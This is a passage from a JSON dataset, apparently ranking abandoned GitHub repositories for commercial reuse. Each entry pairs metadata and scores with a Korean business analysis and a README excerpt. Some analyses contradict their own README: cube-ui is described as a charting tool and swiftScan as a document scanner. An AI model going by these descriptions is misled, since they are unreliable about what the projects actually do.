actively maintained. The repo is used to serve github pages so I would like to keep it as is. Feel free to fork and host your own versions of Elevator Saga! But I would like to keep the domain name with the original version of the game.\n\n![Image of Elevator Saga in browser](https://raw.githubusercontent.com/magwo/elevatorsaga/master/images/screenshot.png)\n","composite_score":0.314,"license_safety_tag":"safe"},{"name":"mobxjs/mobx-react","github_url":"https://github.com/mobxjs/mobx-react","stars":6,"language":"TypeScript","license":"mit","abandonment_months":66,"description":"# mobx-react 저장소 평가\n\n## 왜 보물인가\n웹사이트나 앱을 만들 때 화면 데이터를 효율적으로 관리해주는 도구로, 개발 속도를 크게 단축시킬 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 대시보드나 관리 화면처럼 복잡한 데이터를 표시하는 웹 애플리케이션 개발\n- **내부 업무 도구**: 회사 직원들이 사용하는 재고 관리, ","readme_excerpt":"# mobx-react\n\n----\n\n## 🚨🚨🚨 This repo has been moved to [mobx](https://github.com/mobxjs/mobx/tree/main/packages/mobx-react)\n\n----\n\n[![CircleCI](https://circleci.com/gh/mobxjs/mobx-react.svg?style=svg)](https://circleci.com/gh/mobxjs/mobx-react)\n[![CDNJS](https://img.shields.io/cdnjs/v/mobx-react.svg)](https://cdnjs.com/libraries/mobx-react)\n[![Minzipped size](https://img.shields.io/bundlephobia/minzip/mobx-react-lite.svg)](https://bundlephobia.com/result?p=mobx-react-lite)\n\n[![TypeScript](https://badges.frapsoft.com/typescript/code/typescript.svg?v=101)](https://github.com/ellerbrock/typescript-badges/)[![code style: prettier](https://img.shields.io/badge/code_style-prettier-ff69b4.svg)](https://github.com/prettier/prettier)\n\n[![Discuss on Github](https://img.shields.io/badge/discuss%20on-GitHub-orange)](https://github.com/mobxjs/mobx/discussions)\n[![View changelog](https://img.shields.io/badge/changelogs.xyz-Explore%20Changelog-brightgreen)](https://changelogs.xyz/mobx-react)\n\nPackage","composite_score":0.3139,"license_safety_tag":"safe"},{"name":"shrutikapoor08/talent-for-hire","github_url":"https://github.com/shrutikapoor08/talent-for-hire","stars":9,"language":"SCSS","license":"unknown","abandonment_months":16,"description":"# talent-for-hire 사업화 분석\n\n## 왜 보물인가\n프리랜서와 기업을 자동으로 연결해주는 구인·구직 플랫폼으로, 인력 채용의 번거로운 과정을 단순화할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 중소 스타트업이 월 구독료를 내고 프리랜서를 쉽게 찾는 채용 플랫폼\n- **내부 업무 도구**: 대기업의 HR팀이 단기 프로젝","readme_excerpt":"---\nlayout: page title: Talent List\n---\n\n# Looking for a job during COVID pandemic sucks!\n\nI want to help you get your next role faster. I am sharing this list with my network of recruiters and hiring managers\nwhenever someone reaches out to me for an opportunity. If you are interested, you can enter your info to be a part of\nthis talent list. There are no strings attached and there is no catch. This is not a marketing strategy. I will never\nuse your email for anything other than the purpose stated above.\n\n_Just trying to do my best to help out. Wish you best of luck with your job search!_\n\nDid this repo help you? [Support me by becoming a Github sponsor](https://github.com/sponsors/shrutikapoor08/). Your support helps me help others.❤️\n\n\n## Steps to add yourself to this repo\n\n1. Click on \"Fork\" in the top right corner.\n2. Open `README.MD` and edit the file.\n3. Copy this `| | | | | | |`  and paste it at the bottom of the list of candidates for the country you are in.\n4. Add your info i","composite_score":0.3139,"license_safety_tag":"unknown"},{"name":"Sorosliu1029/follower-change","github_url":"https://github.com/Sorosliu1029/follower-change","stars":7,"language":"TypeScript","license":"MIT","abandonment_months":16,"description":"# Sorosliu1029/follower-change 분석\n\n## 왜 보물인가\nSNS 팔로워 수 변화를 자동으로 추적하고 기록해주는 도구로, 인플루언서나 브랜드가 소셜 미디어 성장을 체계적으로 모니터링할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 인플루언서 마케팅 업체가 클라이언트의 팔로워 증감 추이를 대시보드로 제공하는 월 ","readme_excerpt":"# Follower Change\n\n\n### What this action does ?\n\nGet GitHub follower change event, i.e. when a user follows or unfollows you.\n\nIt is **not** realtime, since GitHub does not provide 'follow' events.\n\nSo you may run it periodically as a cron job.\n\nRefer to [detailed explanation](#how-it-works-) for how it works.\n\n### [My own working example:](https://github.com/Sorosliu1029/Sorosliu1029/blob/master/.github/workflows/follower-notifier.yml)\n\n```yaml\nname: follower notifier\non:\n  # notify me daily\n  schedule:\n    - cron: '0 3 * * *' # in UTC time\njobs:\n  main:\n    runs-on: ubuntu-latest\n    steps:\n      - name: get follower change\n        id: followerChange\n        uses: Sorosliu1029/follower-change@v2\n        with:\n          myToken: ${{ secrets.MY_TOKEN }}\n          notifyUnFollowEvent: true\n      - name: email me\n        uses: dawidd6/action-send-mail@v3\n        if: steps.followerChange.outputs.shouldNotify == 'true'\n        with:\n          server_address: smtp.qq.com\n          server_po","composite_score":0.3139,"license_safety_tag":"safe"},{"name":"brendandburns/designing-distributed-systems-labs","github_url":"https://github.com/brendandburns/designing-distributed-systems-labs","stars":13,"language":"JavaScript","license":"unknown","abandonment_months":40,"description":"# brendandburns/designing-distributed-systems-labs 분석\n\n## 왜 보물인가\n여러 개의 컴퓨터가 함께 일하도록 설계하는 방법을 배우고 실습할 수 있는 실제 코드 모음입니다.\n\n## 어디에 쓸 수 있나\n1. **클라우드 인프라 교육 플랫폼**: 기업 직원들이 분산 시스템을 학습하는 온라인 강의 서비스\n2. **개발자 온","readme_excerpt":"# Designing Distributed Systems - Labs #\n## Labs for Designing Distributed Systems ##\n\nThe samples in this lab are written with the reader of this book in mind: https://azure.microsoft.com/en-us/resources/designing-distributed-systems/en-us/ and will guide you through the steps in designing and deploying distributed systems in Microsoft Azure.\n\n## 1.1. Single Node Pattern: Ambassador\n\nIn this lab we'll guide you through the steps to implement the Ambassador pattern with NGINX in Kubernetes by deploying a request splitting service that will split 10% of the incoming HTTP requests to an experimental server. This request splitting service can then be used in a scenario where you want to test a new version of a back-end service with only a subset of the requests. \n\n![Architecture Overview of the Batch Computational Pattern](/1.%20Single%20Node%20Pattern/1.1.%20Request%20Splitter/images/AmbassadorPattern.png)\n\nGo to lab: [1.1. Request Splitter](/1.%20Single%20Node%20Pattern/1.1.%20Request%2","composite_score":0.3139,"license_safety_tag":"unknown"},{"name":"imsun/gitment","github_url":"https://github.com/imsun/gitment","stars":5,"language":"JavaScript","license":"mit","abandonment_months":56,"description":"# imsun/gitment 상업화 분석\n\n## 왜 보물인가\n블로그나 웹사이트에 깃허브 계정으로 댓글 기능을 추가할 수 있는 도구로, 별도의 댓글 서버 구축 없이 사용자 상호작용을 간단하게 관리할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 기술 블로그 플랫폼 (SaaS)**\n마크다운 기반 블로그 서비스에서 깃허브 계정 연동 댓글 시스템으로 제공하여","readme_excerpt":"# Gitment\n\n\n[![NPM version][npm-image]][npm-url]\n\n[npm-image]: https://img.shields.io/npm/v/gitment.svg\n[npm-url]: https://www.npmjs.com/package/gitment\n\nGitment is a comment system based on GitHub Issues,\nwhich can be used in the frontend without any server-side implementation.\n\n[Demo Page](https://imsun.github.io/gitment/)\n\n[中文简介](https://imsun.net/posts/gitment-introduction/)\n\n- [Features](#features)\n- [Get Started](#get-started)\n- [Methods](#methods)\n- [Customize](#customize)\n- [About Security](#about-security)\n\n## Features\n\n- GitHub Login\n- Markdown / GFM support\n- Syntax highlighting\n- Notifications from GitHub\n- Easy to customize\n- No server-side implementation\n\n## Get Started\n\n### 1. Install\n\n```html\n<link rel=\"stylesheet\" href=\"https://imsun.github.io/gitment/style/default.css\">\n```\n\n```html\n<script src=\"https://imsun.github.io/gitment/dist/gitment.browser.js\"></script>\n```\n\nor via npm:\n\n```sh\n$ npm i --save gitment\n```\n\n```javascript\nimport 'gitment/style/default.css'\nimport ","composite_score":0.3139,"license_safety_tag":"safe"},{"name":"Shopify/draggable","github_url":"https://github.com/Shopify/draggable","stars":12,"language":"JavaScript","license":"MIT","abandonment_months":6,"description":"# Shopify/draggable 기술 평가 보고서\n\n## 왜 보물인가\n웹사이트에서 마우스로 끌어서 놓기(드래그앤드롭) 기능을 쉽게 만들 수 있는 도구로, 전 세계 수천 개 웹서비스가 사용하고 있는 검증된 기술입니다.\n\n## 어디에 쓸 수 있나\n**1. 프로젝트 관리 SaaS**: 업무 카드를 열과 행 사이에 드래그해서 진행 상황을 업데이트하는 칸반 보드","readme_excerpt":"[![npm version](https://img.shields.io/npm/v/@shopify/draggable.svg?label=@shopify/draggable)](https://www.npmjs.com/package/@shopify/draggable) [![CI](https://github.com/shopify/draggable/workflows/CI/badge.svg)](https://github.com/Shopify/draggable/actions?query=branch%3Amain) [![PRs Welcome](https://img.shields.io/badge/PRs-welcome-brightgreen.svg)](https://github.com/Shopify/draggable/blob/main/CONTRIBUTING.md) ![Bundle size](https://img.shields.io/badge/Bundle%20size-16.2kB-red.svg)\n\n<a href=\"https://shopify.github.io/draggable\" title=\"Visit Draggable website\">\n  <img src=\"https://user-images.githubusercontent.com/643944/35602291-99e2c56e-0605-11e8-847f-95f1f6be1610.jpg\" alt=\"\">\n</a>\n\n# Development\n\n**Draggable is no longer maintained by its original authors.** Maintenance of this repo has been passed on to new collaborators and is no longer worked on by anyone at Shopify.\n\n**We are still looking for more maintainers!** If anyone is interested in answering / triaging issues, revie","composite_score":0.3137,"license_safety_tag":"safe"},{"name":"MxABC/swiftScan","github_url":"https://github.com/MxABC/swiftScan","stars":9,"language":"Swift","license":"mit","abandonment_months":31,"description":"# swiftScan 상용화 분석\n\n## 왜 보물인가\n빠르고 정확하게 문서나 이미지를 스캔하고 처리할 수 있는 기술로, 종이 서류를 디지털로 변환해야 하는 모든 업체에서 수요가 높습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 개인사용자와 소상공인을 위한 '모바일 스캐너 앱' 구독형 서비스\n2. **내부 업무 도구**: 은행/보험사의 고객","readme_excerpt":"\r\n# iOS qrCode、barCode Swift Version\r\n\r\n[![Platform](https://img.shields.io/badge/platform-iOS-red.svg)](https://developer.apple.com/iphone/index.action)\r\n[![Language](http://img.shields.io/badge/language-swift4.0-yellow.svg?style=flat\r\n             )](https://en.wikipedia.org/wiki/swift)\r\n[![License](https://img.shields.io/badge/license-MIT-blue.svg)](http://mit-license.org)\r\n\r\n\r\n\r\n### Objective-c Version: **[LBXScan](https://github.com/MxABC/LBXScan)**\r\n\r\n### [中文介绍](https://github.com/MxABC/swiftScan/blob/master/README-Chinese.md)\r\n\r\n\r\n## Introduce\r\n#### Swift: The packaging system API comes with scan code and image recognition function\r\n\r\n- scan code interface\r\n- QR code and bar code recognition and generation\r\n- image recognition from the Album (Test results are not good)\r\n\r\n#### **Imitate other app**\r\n\r\n1、 QQ scan code interface\r\n2、Alipay scan code interface\r\n3、Wechat scan code interface\r\n\r\n#### **Other settings parameters custom effects**\r\n- The background color can be set around","composite_score":0.3136,"license_safety_tag":"safe"},{"name":"erikras/ducks-modular-redux","github_url":"https://github.com/erikras/ducks-modular-redux","stars":5,"language":"JavaScript","license":"unknown","abandonment_months":53,"description":"# erikras/ducks-modular-redux 분석\n\n## 왜 보물인가\n웹 애플리케이션의 복잡한 데이터 관리를 체계적으로 정리해주는 '설계 패턴'으로, 개발자들이 더 빠르고 안정적으로 서비스를 만들 수 있게 돕습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 관리 도구**: 복잡한 사용자 데이터와 설정을 다루는 클라우드 기반 협업 소프트웨어에 적","readme_excerpt":"<p align=\"center\">\n<a href=\"https://codefund.io/properties/555/visit-sponsor\">\n<img src=\"https://codefund.io/properties/555/sponsor\" />\n</a>\n</p>\n    \n# Ducks: Redux Reducer Bundles\n\n<img src=\"duck.jpg\" align=\"right\"/>\n\nI find as I am building my redux app, one piece of functionality at a time, I keep needing to add  `{actionTypes, actions, reducer}` tuples for each use case. I have been keeping these in separate files and even separate folders, however 95% of the time, it's only one reducer/actions pair that ever needs their associated actions.\n\nTo me, it makes more sense for these pieces to be bundled together in an isolated module that is self contained, and can even be packaged easily into a library.\n\n## The Proposal\n\n### Example\n\nSee also: [Common JS Example](CommonJs.md).\n\n```javascript\n// widgets.js\n\n// Actions\nconst LOAD   = 'my-app/widgets/LOAD';\nconst CREATE = 'my-app/widgets/CREATE';\nconst UPDATE = 'my-app/widgets/UPDATE';\nconst REMOVE = 'my-app/widgets/REMOVE';\n\n// Reducer\n","composite_score":0.3135,"license_safety_tag":"unknown"},{"name":"Microsoft/napajs","github_url":"https://github.com/Microsoft/napajs","stars":10,"language":"C++","license":"NOASSERTION","abandonment_months":46,"description":"# Microsoft/napajs 프로젝트 분석\n\n## 왜 보물인가\n마이크로소프트가 만든 이 프로젝트는 복잡한 계산 작업을 여러 개의 작은 단위로 나누어 동시에 처리함으로써 컴퓨터의 성능을 극대화하는 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **데이터 분석 SaaS**: 대규모 고객 데이터를 빠르게 분석하고 시각화하는 웹 서비스로 판매\n2. **기업 내","readme_excerpt":"[![Build Status for Linux/MacOS](https://travis-ci.org/Microsoft/napajs.svg?branch=master)](https://travis-ci.org/Microsoft/napajs)\n[![Build Status for Windows](https://ci.appveyor.com/api/projects/status/github/Microsoft/napajs?branch=master&svg=true)](https://ci.appveyor.com/project/napajs/napajs)\n[![npm version](https://badge.fury.io/js/napajs.svg)](https://www.npmjs.com/package/napajs)\n[![Downloads](https://img.shields.io/npm/dm/napajs.svg)](https://www.npmjs.com/package/napajs)\n\n# Napa.js\nNapa.js is a multi-threaded JavaScript runtime built on [V8](https://github.com/v8/v8), which was originally designed to develop highly iterative services with non-compromised performance in Bing. As it evolves, we find it useful to complement [Node.js](https://nodejs.org) in CPU-bound tasks, with the capability of executing JavaScript in multiple V8 isolates and communicating between them. Napa.js is exposed as a Node.js module, while it can also be embedded in a host process without Node.js dep","composite_score":0.3134,"license_safety_tag":"unknown"},{"name":"skilion/onedrive","github_url":"https://github.com/skilion/onedrive","stars":6,"language":"D","license":"gpl-3.0","abandonment_months":55,"description":"# OneDrive 자동 동기화 도구 분석\n\n## 왜 보물인가\n마이크로소프트 OneDrive의 파일들을 자동으로 백업하고 관리할 수 있는 도구로, 클라우드 저장소를 더 효율적으로 사용하고 싶은 사람들의 문제를 해결합니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스**\n- OneDrive 파일을 자동으로 다른 클라우드 서비스(구글 드라이브, Dro","readme_excerpt":"# OneDrive Free Client\n###### A complete tool to interact with OneDrive on Linux. Built following the UNIX philosophy.\n\n### Features:\n* State caching\n* Real-Time file monitoring with Inotify\n* Resumable uploads\n* Support OneDrive for Business (part of Office 365)\n* Shared folders (only OneDrive Personal)\n\n### What's missing:\n* While local changes are uploaded right away, remote changes are delayed\n* No GUI\n\n## Getting Started\n\n### Prerequisites\n* [libcurl](http://curl.haxx.se/libcurl/)\n* [SQLite 3](https://www.sqlite.org/)\n* [Digital Mars D Compiler (DMD)](http://dlang.org/download.html)\n\n### Prerequisites: Ubuntu/Debian\n```sh\nsudo apt install git libcurl4-openssl-dev libsqlite3-dev\n\n# Ubuntu 18+\nsudo snap install --classic dmd\n\n# Ubuntu 17 & Debian\nsudo wget https://netcologne.dl.sourceforge.net/project/d-apt/files/d-apt.list -O /etc/apt/sources.list.d/d-apt.list\nsudo apt-get update --allow-insecure-repositories\nsudo apt-get -y --allow-unauthenticated install --reinstall d-apt-keyring","composite_score":0.3134,"license_safety_tag":"restricted"},{"name":"skevy/graphiql-app","github_url":"https://github.com/skevy/graphiql-app","stars":5,"language":"JavaScript","license":"mit","abandonment_months":34,"description":"# GraphiQL App 상품화 분석\n\n## 왜 보물인가\n웹 개발자들이 데이터베이스와 통신하는 과정을 시각적으로 쉽게 테스트할 수 있는 도구로, 복잡한 기술 작업을 단순하게 만들어줍니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스 (API 개발 회사)**\n- API를 만드는 스타트업들이 고객에게 제공할 수 있는 기본 테스트 도구로 통합 판매\n\n","readme_excerpt":"GraphiQL.app\n------------\n\n[![Build Status](https://travis-ci.org/skevy/graphiql-app.svg?branch=master)](https://travis-ci.org/skevy/graphiql-app)\n\nA light, Electron-based wrapper around GraphiQL.\n\nProvides a tabbed interface for editing and testing GraphQL queries/mutations with GraphiQL.\n\n#### macOS installation\n\nIf you have [Homebrew](http://brew.sh/) installed on macOS:\n\n```\nbrew install --cask graphiql\n```\n\nAlternately, download the binary from the [Releases](https://github.com/skevy/graphiql-app/releases) tab.\n\n#### Linux installation\n\nThe graphiql-app uses the [AppImage](https://appimage.org/) format for its Linux version. You download it from the  [Electron app directory](https://electronjs.org/apps/graphiql) (click the \"Download for Linux\"-button) or from the [Releases](https://github.com/skevy/graphiql-app/releases) tab.\n\nEither way, you will get a `.AppImage` binary. Put it in a safe place and make it executable:\n\n```\nchmod +x graphiql-app-0.7.2-x86_64.AppImage\n```\n\nThen sim","composite_score":0.3133,"license_safety_tag":"safe"},{"name":"didi/cube-ui","github_url":"https://github.com/didi/cube-ui","stars":26,"language":"JavaScript","license":"Apache-2.0","abandonment_months":5,"description":"# didi/cube-ui 분석 보고서\n\n## 왜 보물인가\n디디(중국 최대 배차앱)가 만든 데이터 시각화 도구로, 복잡한 데이터를 이해하기 쉬운 차트와 그래프로 보여주는 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 중소기업용 매출 분석 대시보드 서비스 (월별 매출, 고객 추이 등을 시각화)\n2. **내부 업무 도구**: 대기업 데이","readme_excerpt":"\n# cube-ui [![Build Status](https://travis-ci.org/didi/cube-ui.svg?branch=master)](https://travis-ci.org/didi/cube-ui?branch=master) [![codecov.io](http://codecov.io/github/didi/cube-ui/coverage.svg?branch=master)](http://codecov.io/github/didi/cube-ui?branch=master) [![downloads](https://img.shields.io/npm/dm/cube-ui.svg)](https://www.npmjs.com/package/cube-ui)\n\n> A fantastic mobile ui lib implement by Vue.\n\n### Links\n\n- [Home](https://didi.github.io/cube-ui/)\n- [Docs](https://didi.github.io/cube-ui/#/en-US/docs)\n- [Example](https://didi.github.io/cube-ui/example/)\n\n  ![Example QR](./assets/example-qr.png)\n\n- [Application Guide](https://github.com/cube-ui/cube-application-guide)\n\n### Communication\n\n![QQ Community QR](./assets/cube-qq-QR.jpg)\n\n### New cube-ui project ?\n\nRecommend use the [CLI tools](https://github.com/cube-ui/cube-template) base on [vue-cli](https://github.com/vuejs/vue-cli) to init the config and base code:\n\n```shell\n$ vue init cube-ui/cube-template projectname\n```\n\n#","composite_score":0.3132,"license_safety_tag":"safe"},{"name":"Tencent/phxqueue","github_url":"https://github.com/Tencent/phxqueue","stars":6,"language":"C++","license":"NOASSERTION","abandonment_months":38,"description":"# Tencent/phxqueue 상용화 분석\n\n## 왜 보물인가\n대규모 서비스에서 수백만 건의 작업을 안정적으로 처리하는 메시지 큐 기술로, 네이버·카카오·쿠팡 같은 대형 플랫폼에서 필수적인 인프라입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 전자상거래 플랫폼의 주문 처리, 배송 알림, 결제 관리를 자동으로 처리하는 백엔드 서비스\n2.","readme_excerpt":"# PhxQueue\n\n[简体中文README](README.zh_cn.md)\n\nPhxQueue is a high-availability, high-throughput and highly reliable distributed queue based on the Paxos protocol. It guarantees At-Least-Once Delivery. It is widely used in WeChat for WeChat Pay, WeChat Media Platform, and many other important businesses.\n\nAuthors: Junjie Liang, Tao He, Haochuan Cui, Qing Huang and Jiatao Xu\n\nContact us: phxteam@tencent.com\n\n[![Build Status](https://travis-ci.org/Tencent/phxqueue.svg?branch=master)](https://travis-ci.org/Tencent/phxqueue)\n\n## Features\n\n*\tGuaranteed delivery with strict real-time reconciliation\n\n*\tServer-side batch enqueue\n\n*\tStrictly ordered dequeue\n\n*\tMultiple consumer groups\n\n*\tDequeue speed limits\n\n*\tDequeue replays\n\n*\tConsumer load balancing\n\n*\tAll modules are scalable\n\n*\tMulti-region deployment for Store or Lock nodes\n\n## Building automatically\n\n```sh\ngit clone https://github.com/Tencent/phxqueue\ncd phxqueue/\nbash build.sh\n```\n\nNow that all modules are built, you can continue to [quicks","composite_score":0.3132,"license_safety_tag":"unknown"},{"name":"coinbase/gdax-node","github_url":"https://github.com/coinbase/gdax-node","stars":7,"language":"JavaScript","license":"apache-2.0","abandonment_months":77,"description":"# coinbase/gdax-node 분석\n\n## 왜 보물인가\n암호화폐 거래소와 연결하는 기술을 간단하게 만들어주므로, 암호화폐 자동 거래 서비스를 빠르게 만들 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 사용자가 웹사이트에서 클릭만으로 암호화폐를 자동 매매할 수 있는 구독형 투자 자동화 플랫폼\n2. **내부 업무 도구**: 암호","readme_excerpt":"# Coinbase Pro [![CircleCI](https://circleci.com/gh/coinbase/coinbase-pro-node.svg?style=svg)](https://circleci.com/gh/coinbase/coinbase-pro-node) [![npm version](https://badge.fury.io/js/coinbase-pro.svg)](https://badge.fury.io/js/coinbase-pro)\n\n**Note**: The `gdax` package is deprecated and might have to be removed from NPM.\nPlease migrate to the `coinbase-pro` package to ensure future compatibility.\n\nThe official Node.js library for Coinbase's [Pro API](https://docs.pro.coinbase.com/).\n\n## Features\n\n- Easy functionality to use in programmatic trading\n- A customizable, websocket-synced Order Book implementation\n- API clients with convenient methods for every API endpoint\n- Abstracted interfaces – don't worry about HMAC signing or JSON formatting; the\n  library does it for you\n\n## Installation\n\n```bash\nnpm install coinbase-pro\n```\n\nYou can learn about the API responses of each endpoint [by reading our\ndocumentation](https://docs.pro.coinbase.com/#market-data).\n\n## Quick Start\n\nThe Coi","composite_score":0.3131,"license_safety_tag":"safe"},{"name":"lewagon/dotfiles","github_url":"https://github.com/lewagon/dotfiles","stars":34,"language":"Shell","license":"MIT","abandonment_months":6,"description":"# lewagon/dotfiles 상용화 분석\n\n## 왜 보물인가\n프로그래머들이 매일 쓰는 작업 환경을 한 번에 설정할 수 있는 설명서로, 유명 교육기관(르왜곤)의 노하우가 담겨 있어 신뢰도가 높습니다.\n\n## 어디에 쓸 수 있나\n1. **개발자 온보딩 SaaS**: 신입 개발자가 입사 첫날 이 도구로 자동 환경 설정하는 유료 서비스\n2. **기업 개발팀 ","readme_excerpt":"This repository is used by [Le Wagon](https://www.lewagon.com) students.\n\n## Toolset\n\n- [oh-my-zsh](http://ohmyz.sh/)\n- [Visual Studio Code](https://code.visualstudio.com/)\n- [git](https://git-scm.com/)\n","composite_score":0.313,"license_safety_tag":"safe"},{"name":"tastejs/awesome-app-ideas","github_url":"https://github.com/tastejs/awesome-app-ideas","stars":5,"language":"","license":"unknown","abandonment_months":24,"description":"# awesome-app-ideas 분석 리포트\n\n## 왜 보물인가\n앱 개발 아이디어를 모아둔 창고로, 창업가나 개발자들이 \"뭘 만들까?\" 고민할 때 영감을 얻을 수 있는 자료 모음입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 이 아이디어들을 기반으로 실제 웹 서비스나 모바일 앱을 만들어 구독료로 판매\n2. **내부 업무 도구**: 회사","readme_excerpt":"# awesome-app-ideas [![Awesome](https://cdn.rawgit.com/sindresorhus/awesome/d7305f38d29fed78fa85652e3a63e154dd8e8829/media/badge.svg)](https://github.com/sindresorhus/awesome)\n\n> Ideas for sample projects you could create with a framework to demonstrate its approach to solving specific problems\n*Please read the [contribution guidelines](contributing.md) before contributing.*\n\n\n## Ideas\n\n### Arcade Shooter (Galaga etc)\n\n### Battery status monitor\n\n### Benjamin Franklin's 13 Virtues app\n### Book search\n\n### BTN workouts app\n\n### Calculator\n\nA simple Calculator program with Standard functions or with Scientific functions.  \nBasic Arithmetic Operations -> Add, Subtract, Multiply, Divide  \nMemory Operations -> Save to Memory, Recall from Memory, Clear Memory, Operations History  \nOther Operations -> Clear Data (Clears the input area and data from memory)\n\n### Running Calculator - Time, Distance, Pace for your next race\n\n### Calendar app\n\n### Calorie Counter (Weight loss) app\n\n### Chat bot\n\n","composite_score":0.3129,"license_safety_tag":"unknown"},{"name":"literallycanvas/literallycanvas","github_url":"https://github.com/literallycanvas/literallycanvas","stars":12,"language":"CoffeeScript","license":"bsd-2-clause","abandonment_months":73,"description":"# Literally Canvas 평가 리포트\n\n## 왜 보물인가\n웹 브라우저에서 직접 그림을 그릴 수 있는 도구로, 온라인 디자인 서비스나 협업 플랫폼에 손쉽게 붙여서 사용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**SaaS 서비스**\n- 온라인 교육 플랫폼에 통합하여 학생들이 수학 문제나 그림을 직접 그려서 제출하는 기능 제공\n\n**내부 업무 도구","readme_excerpt":"Literally Canvas v1.0.0\n=======================\n\nLiterally Canvas is an extensible, open source (BSD-licensed), HTML5 drawing\nwidget. Its only dependencies are [React.js](http://facebook.github.io/react/) and its core lib which has been split up into a separate module [literallycanvas-core](https://github.com/literallycanvas/literallycanvas-core/).\n\nGet help on our mailing list by sending an email to\n[literallycanvas+subscribe@googlegroups.com](mailto:literallycanvas+subscribe@googlegroups.com)\nor by visiting [Google Groups](https://groups.google.com/forum/#!forum/literallycanvas).\n\n### [Full documentation](http://literallycanvas.com)\n\n### [Examples](http://github.com/literallycanvas/literallycanvas-demos)\n\nAlong with the CSS, JS, and image assets, this is all it takes:\n\n```javascript\n<div class=\"my-drawing\"></div>\n<script>\n  LC.init(document.getElementsByClassName('my-drawing')[0]);\n</script>\n```\n\nState of the project\n--------------------\n\nNo one is maintaining this project. If you re","composite_score":0.3129,"license_safety_tag":"safe"},{"name":"sjdy521/Mojo-Webqq","github_url":"https://github.com/sjdy521/Mojo-Webqq","stars":11,"language":"Perl","license":"bsd-2-clause","abandonment_months":87,"description":"# Mojo-Webqq 프로젝트 분석\n\n## 왜 보물인가\nQQ 메신저를 자동으로 제어할 수 있는 도구로, 채팅 자동화나 봇 개발이 필요한 사람들에게 유용합니다.\n\n## 어디에 쓸 수 있나\n1. **고객 상담 자동화 서비스**: QQ를 통한 자동 응답 챗봇을 기업에 제공하는 SaaS\n2. **마케팅 자동화 도구**: 기업의 QQ 계정에서 자동으로 메시지 발송","readme_excerpt":"Mojo-Webqq v2.2.7 [![Build Status](https://travis-ci.org/sjdy521/Mojo-Webqq.svg?branch=master)](https://travis-ci.org/sjdy521/Mojo-Webqq) [![Join the chat at https://gitter.im/sjdy521/Mojo-Webqq](https://badges.gitter.im/sjdy521/Mojo-Webqq.svg)](https://gitter.im/sjdy521/Mojo-Webqq?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge) [![API列表](https://img.shields.io/badge/doc-API%E5%88%97%E8%A1%A8-brightgreen.svg)](API.md) [![QQ群-498880156](https://img.shields.io/badge/QQ%E7%BE%A4-498880156-blue.svg)](http://jq.qq.com/?_wv=1027&k=kjVJzo) [![IRC](https://img.shields.io/badge/IRC-%E5%AE%98%E6%96%B9%E9%A2%91%E9%81%93-yellow.svg)](http://irc.perfi.wang/?channel=#Mojo-Webqq)\n========================\n\n### !!!重要通知：WebQQ将在2019年1月1日停止服务，项目目前已停止维护，感谢大家四年来一路陪伴\n\n使用Perl语言编写的Smartqq客户端框架，基于Mojolicious，要求Perl版本5.10+，可通过插件提供基于HTTP协议的api接口供其他语言或系统调用\n\n### 郑重声明\n\n本项目完全遵循QQ官方提供的原始功能，不包含任何破坏、盗号等行为，本项目完全开源，目的是为了促进技术交流学习，禁止任何对国家、企业、个人等构成危害的非法用途，否则后果自负\n\n### 特色功能\n\n* 支持 账号密码登录（可能已失效），二维码扫码登","composite_score":0.3128,"license_safety_tag":"safe"},{"name":"sorrycc/blog","github_url":"https://github.com/sorrycc/blog","stars":6,"language":"","license":"unknown","abandonment_months":87,"description":"# sorrycc/blog 분석 보고서\n\n## 왜 보물인가\n개인 블로그 운영에 필요한 기본 기능들을 미리 만들어둔 시작용 틀(템플릿)로, 블로그를 시작하고 싶은 사람들이 처음부터 다시 만들 필요 없이 바로 사용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **개인 블로그 서비스(SaaS)**: 사용자가 클릭만으로 자신의 블로그를 만들 수 있는 웹 서비스","readme_excerpt":"# blog\n\npersonal blog repository.\n\n","composite_score":0.3128,"license_safety_tag":"unknown"},{"name":"AdminTurnedDevOps/DevOps-The-Hard-Way-AWS","github_url":"https://github.com/AdminTurnedDevOps/DevOps-The-Hard-Way-AWS","stars":12,"language":"HCL","license":"MIT","abandonment_months":13,"description":"# AdminTurnedDevOps/DevOps-The-Hard-Way-AWS 분석\n\n## 왜 보물인가\n클라우드 서버 관리를 처음부터 배우고 싶은 사람들을 위한 실용적인 학습 가이드로, 회사의 IT 인프라를 스스로 구축할 수 있게 해주는 자료입니다.\n\n## 어디에 쓸 수 있나\n1. **스타트업 기술 교육 SaaS**: 신입 개발자나 비개발자 창업자를 위한 ","readme_excerpt":"# DevOps-The-Hard-Way-AWS\n\nThis tutorial contains a full, real-world solution for setting up an environment that is using DevOps technologies and practices for deploying apps and cloud services/cloud infrastructure to AWS.\n\n\nThe repository contains free labs, documentation, diagrams, and docs for setting up an entire workflow and DevOps environment from a real-world perspective in AWS.\n\n## DevOps Scenario\nThe scenario that you're currently facing is you work in an organization that is very monolithic. There is a ton of bare metal, virtualization, manual deployments of applications, and **old school** practices based on the current teams knowledge of IT.\n\nYou're brought in to the company and team to make things more modern so the organization can not only succeed, but stay ahead of their competition. Management now understands the needs and complexity that comes with staying ahead of their competition and they know that they need to. Otherwise, the organization will fall...\n\n## DevOps S","composite_score":0.3128,"license_safety_tag":"safe"},{"name":"petehunt/react-howto","github_url":"https://github.com/petehunt/react-howto","stars":5,"language":"","license":"unknown","abandonment_months":23,"description":"# petehunt/react-howto 분석 보고서\n\n## 왜 보물인가\nReact라는 웹 개발 도구를 배우고 싶은 사람들을 